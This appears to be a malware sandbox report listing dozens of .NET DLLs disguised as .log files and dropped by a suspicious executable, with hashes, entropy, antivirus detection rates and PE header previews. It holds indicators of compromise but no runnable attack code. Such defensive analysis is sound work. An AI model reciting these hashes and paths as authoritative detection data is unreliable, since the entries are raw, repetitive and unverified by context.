Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\EvoHLreS.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\FVlaiPXZ.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FXwZeocX.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FfPYKNJo.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FzdFbFVV.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GBhRZStr.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GLAhPCYV.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GPaymKbQ.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\GTNiEPlU.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GhhRBgVS.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\HQSFHwhn.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\HQUAuzHx.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\HiZYWSbq.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\HplZKgpp.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\HxbpgajN.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\INvIQzWs.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\IUYfDSlJ.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\IimQJXBp.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IjUzWPZN.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IlfySofL.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IuCyCayI.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

